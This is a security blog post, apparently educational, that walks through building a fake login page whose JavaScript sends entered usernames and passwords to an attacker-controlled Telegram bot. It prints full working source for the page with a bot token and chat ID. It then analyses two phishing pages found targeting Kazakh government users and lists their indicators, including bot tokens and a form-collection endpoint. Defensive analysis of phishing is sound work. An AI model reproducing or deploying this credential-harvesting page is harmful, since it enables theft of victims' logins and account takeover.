Malware development trick 50: phishing attack using a fake login page with Telegram exfiltration. Simple Javascript example.

﷽

Hello, cybersecurity enthusiasts and white hackers!

tLab technologies company recently discovered one of the first in Kazakhstan in interesting phishing campaign aimed at one of the clients. The method itself is perhaps not so new: data exfiltration through legitimate resources is powered by many threat actors, but the professional approach to phishing itself is interesting. For an ordinary inexperienced user, everything looks quite legitimate

Phishing attacks remain one of the most prominent methods for cybercriminals to steal sensitive data. In this post, we’ll break down how a malicious HTML page can be crafted to steal user credentials via a fake login page, using Telegram as the communication channel to exfiltrate the stolen data. We’ll also explore how such an attack could work in practice with a Proof of Concept (PoC).

the attack: fake login page and Telegram bot integration

The attack starts with a fake login page that looks identical to legitimate websites. When a victim enters their credentials (username and password), the data is captured by malicious JavaScript running in the background and sent to the attacker via a Telegram bot using the Telegram Bot API.

practical example

In this section, we’ll look at how a malicious HTML page can be used to collect user credentials and exfiltrate the data via the Telegram API. The page will contain a fake login form designed to look like a legitimate site. Once the victim enters their credentials (username and password), the data is captured using JavaScript and sent to attacker via Telegram bot.

First of all, HTML page contains a login form where the user is prompted to enter their username and password:

<div class="login-form">
  <h2>Login to Your Account</h2>
  <form id="loginForm" action="javascript:void(0);">
      <input type="text" id="username" name="username" placeholder="Username" required>
      <input type="password" id="password" name="password" placeholder="Password" required>
      <button type="submit">Login</button>
  </form>
</div>

The form doesn’t submit the data normally. Instead, it is intercepted by JavaScript:

document.getElementById('loginForm').addEventListener('submit', function(event) {
  event.preventDefault(); // prevent actual form submission

  var username = document.getElementById('username').value;
  var password = document.getElementById('password').value;

  // prepare the payload with stolen data
  var payload = `Username: ${username}\nPassword: ${password}`;

  // send stolen data to Telegram
  sendToTelegram(payload);
});

As you can see, logic is pretty simple: when the user clicks Login, the JavaScript function captures the entered username and password. The data is then packaged into a message that mimics the format of stolen credentials:

var payload = `Username: ${username}\nPassword: ${password}`;

The captured credentials are sent via Telegram bot using a simple GET request to the Telegram API:

function sendToTelegram(message) {
  var chatId = '5547299598'; // chat id for Telegram bot
  var botToken = '7725786727:AAEuylKfQgTg5RBMeXwyk9qKhcV5kULP_po'; // Telegram bot API token
  var apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;

  var xhr = new XMLHttpRequest();
  xhr.open("POST", apiUrl, true);
  xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

  // prepare the POST data in the proper format
  var postData = `chat_id=${chatId}&text=${encodeURIComponent(message)}`;

  // send the POST request with the message
  xhr.send(postData);
}

How it works?

• user enters credentials on the fake login page.
• JavaScript intercepts the form submission and collects the data. - the data is sent via Telegram bot through an API call.
• the attacker can now read the stolen credentials from the Telegram bot chat.

So, full source code looks like this: hack.html:

<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Login - Meow Hacking Portal</title>
  <style>
    body {
      font-family: Arial, sans-serif;
      background: linear-gradient(to right, #00c6ff, #0072ff); /* Smooth blue gradient */
      padding: 20px;
      height: 100vh;
      display: flex;
      justify-content: center;
      align-items: center;
    }
    .login-form {
      background-color: #fff;
      padding: 30px;
      border-radius: 8px;
      box-shadow: 0 4px 8px rgba(0, 0, 0, 0.1);
      width: 300px;
    }
    .login-form input {
      width: 100%;
      padding: 10px;
      margin: 10px 0;
      border: 1px solid #ccc;
      border-radius: 5px;
    }
    .login-form button {
      padding: 10px 20px;
      background-color: #007bff;
      color: white;
      border: none;
      border-radius: 5px;
      cursor: pointer;
    }
    .login-form button:hover {
      background-color: #0056b3;
    }
  </style>
</head>
<body>

  <div class="login-form">
    <h2>Login to Meow Hacking Portal</h2>
    <form id="loginForm" action="javascript:void(0);">
      <input type="text" id="username" name="username" placeholder="Username" required>
      <input type="password" id="password" name="password" placeholder="Password" required>
      <button type="submit">Login</button>
    </form>
  </div>

  <script>
    document.getElementById('loginForm').addEventListener('submit', function(event) {
      event.preventDefault(); // Prevent actual form submission

      var username = document.getElementById('username').value;
      var password = document.getElementById('password').value;

      // Prepare the payload with stolen data
      var payload = `Username: ${username}\nPassword: ${password}. Meow ♥️\uFE0F`;

      // Send stolen data to Telegram
      sendToTelegram(payload);
    });

    function sendToTelegram(message) {
      var chatId = '5547299598'; // chat id for Telegram bot
      var botToken = '7725786727:AAEuylKfQgTg5RBMeXwyk9qKhcV5kULP_po'; // Telegram bot API token
      var apiUrl = `https://api.telegram.org/bot${botToken}/sendMessage`;

      var xhr = new XMLHttpRequest();
      xhr.open("POST", apiUrl, true);
      xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");

      // prepare the POST data in the proper format
      var postData = `chat_id=${chatId}&text=${encodeURIComponent(message)}`;

      // send the POST request with the message
      xhr.send(postData);
    }
  </script>

</body>
</html>

demo

Let’s go to see, everything in action. First of all, open our simple fake login page:

Now, when a user submits their credentials in the fake login form:

the credentials will be sent to a Telegram bot via the POST request:

As you can see, everything is works perfectly! =^..^=!

phishing in the wild

tLab Technologies from Kazakhstan detect such an attack on one of its clients from the public sector in Kazakhstan.

In this case we found another fake login page:

This file is also a piece of JavaScript-based phishing combined with a fake login form. It tries to collect user credentials (email and password) and send them to an external service - likely for malicious purposes. The form is embedded with a telemetry hook that sends the credentials (via fetch and Telegram API) to a remote server.

Let’s break down the Cyber Kill Chain stages based on this file.

targeting the victim - the file is crafted with a focus on credential harvesting from users (likely targeting people who are trying to access government-related resources, such as ***.****.gov.kz).

information gathering - the attacker may already have data (e.g., email addresses) and is crafting the phishing page accordingly.

weaponisation - as you can see, the file itself is the weapon. It contains malicious JavaScript that facilitates the credential-stealing attack. The form is designed to look legitimate, leveraging social engineering tactics.

delivery - the malicious code delivered through phishing email: the user could receive a link to this page via email, which might appear to come from a legitimate source like the government and via malicious link: - the link could be shared on social media or malicious websites.

exploitation - the exploitation happens when the user enters their credentials into the form, believing it to be legitimate. The page exploits the user’s trust by mimicking a known official website.

command and control (C2) - telegram Bot API is used as a covert C2 mechanism. The credentials are sent in real-time to a chat in Telegram, which the attacker monitors to collect and use the stolen data.

actions on objectives - With the stolen credentials, the attacker can access victim’s accounts.

So, target brand is one of the Kazakhstan Ministry (***.***.gov.kz) or supply chain via using Government of Republic of Kazakhstan.

User Interface Deception

• pre-filled email - shows ***@***.***.gov.kz:

• message: Подтвердите свой почтовый ящик, чтобы получить доступ к файлу that means Confirm your mailbox to access the file

• fake security note: Примечание: файл защищен системой безопасности ***.***.gov.kz that means Note: file is protected by ***.***.gov.kz security system

IoCs

network

• telegram bot API token: 7527440371:AAGIaR_ObbDwitbGuKLl4bH_qMt6TnGpuTY
• background image: https://firebasestorage.googleapis.com/v0/b/project-a29a7.appspot.com/o/backphoto3.jpg?alt=media&token=dfd11e8a-3b48-4da0-b3dd-ea852a87922b

• telegram chat ID: 6516482987

Let’s upload this to tLab Anti-APT:

Since the form submission is intercepted by javascript logic, the sandbox takes detailed screenshots of the phishing page to record and analyze the changes. Thus, it is discovered that in our case the page is not updated:

phishing in the wild 2

Another interesting file with similar logic was also found.

File title: Спецификация (Russian for Specification)

The malware is a static HTML file containing a sophisticated phishing form that leverages legitimate third-party services for credential collection and user redirection. The code uses table-based layout with embedded styling and form submission logic.

File: 7ee39d2572f161d4c94bb06bda5bea229d39dc869808ad5f5d110964aa470071.html

What it does?

Static phishing form with blurred background; posts creds to submit-form.com then redirects to legit Microsoft support (to appear successful).

Pre‑filled victim email suggests targeted (spearphish):

Background image obfuscated via base64:

IoCs

File SHA-256 hash: 7ee39d2572f161d4c94bb06bda5bea229d39dc869808ad5f5d110964aa470071

contains base64-encoded string:

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

network indicators:

• collection endpoint - https://submit-form.com/On59mco96
• hidden redirect URL: https://support.microsoft.com/EN-EN/onedrive

In all of this cases tlab Anti-APT use unique combination of analysis methods: extracted relevant text and email address via OCR analysis of rendered context of executable files and HTML, comparison with email data, Telegram API token detection.

Note: all this analyzed automatically, without user interaction

Thank you tLab for your API ♥️!

conclusion

This malware represents a sophisticated credential harvesting campaign with multiple exfiltration methods and professional social engineering tactics. The use of legitimate services (Telegram API, Firebase) for malicious purposes demonstrates advanced evasion techniques. Organizations should implement comprehensive security measures including user education, technical controls, and continuous monitoring to detect and prevent similar attacks.

tLab technologies
Telegram Bot API stealer
source code in Github

This is a practical case for educational purposes only.

Thanks for your time happy hacking and good bye!
PS. All drawings and screenshots are mine